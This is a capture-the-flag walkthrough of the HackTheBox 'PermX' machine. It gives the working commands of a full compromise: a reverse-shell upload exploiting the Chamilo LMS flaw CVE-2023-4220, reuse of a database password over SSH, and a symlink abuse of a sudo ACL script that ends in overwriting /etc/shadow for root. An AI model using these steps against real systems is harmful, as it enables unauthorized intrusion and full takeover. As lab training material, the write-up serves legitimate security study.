Hackthebox - PermX

HackTheBox
1

0x1 Initial Access

  • Nmap scan
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Nothing on port 80, just a static website for elearning platform
  • Subdomain Enumeration:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://permx.htb -H "Host: FUZZ.permx.htb" -fw 18
  • Found endpoints:
    • lms.permx.htb
  • The webapp is powered by Chamilo an opensource learning management system
  • Checking robots.txt reveals restricted directories and files
User-Agent: *

# Directories

Disallow: /app/
Disallow: /bin/
Disallow: /documentation/
Disallow: /home/
Disallow: /main/
Disallow: /plugin/
Disallow: /tests/
Disallow: /vendor/

# Files
Disallow: /license.txt
Disallow: /README.txt
Disallow: /whoisonline.php
Disallow: /whoisonlinesession.php
  • /app exposes the web app files
  • Found Unauthenticated Big Upload File Remote Code Execution in Chamilo LMS; CVE-2023-4220
  • Found the existance of bigUpload.php confirming CVE-2023-4220
  • Upload your php reverse shell
curl -F 'bigUploadFile=@shell.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
  • Setup listener
  • Trigger rce by visiting the url or by using curl;
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/shell.php'

0x2 www-data

  • /var/www/chamilo/app/config/configuration.php reveals MySQL DB credentials
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo111';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03**********W8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
  • MySQL db reveals salts and hashes of admin and ano, since the hashes are bcrypt looks like a rabbit hole.
  • Since port 22 is open, we can try to reuse the MySQL credential for available user on /home ie; mtz
  • The found credentials work for user mtz

0x3 mtz

  • Login via SSH
  • Get user.txt
  • user has sudo privlege on /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
  • The script allows us to modify permissions on files located in home/mtz only, by restricting input .. to prevent path traversal
  • It only checks the path prefix and not the final resolved path of the symlink
  • So, we can create a Synbolic Link that points to a sensitive file or directory

0x4 root

  • Create a symbolic link
ln -s / kitty
  • Use /opt/acl.sh to set permissions (rwx) on shadow file
sudo /opt/acl.sh mtz rwx /home/mtz/kitty/etc/shadow
  • Now we can overwrite the file with generated hash for the root user
  • use openssl to generate hash
openssl passwd -6 kitty
  • Overwrite the shadow file
echo 'root:$6$MEVGg8CazLPgX*********************************yI37J6ER0:19742:0:99999:7:::' > /etc/shadow
  • We can get root shell with su root
  • Get root.txt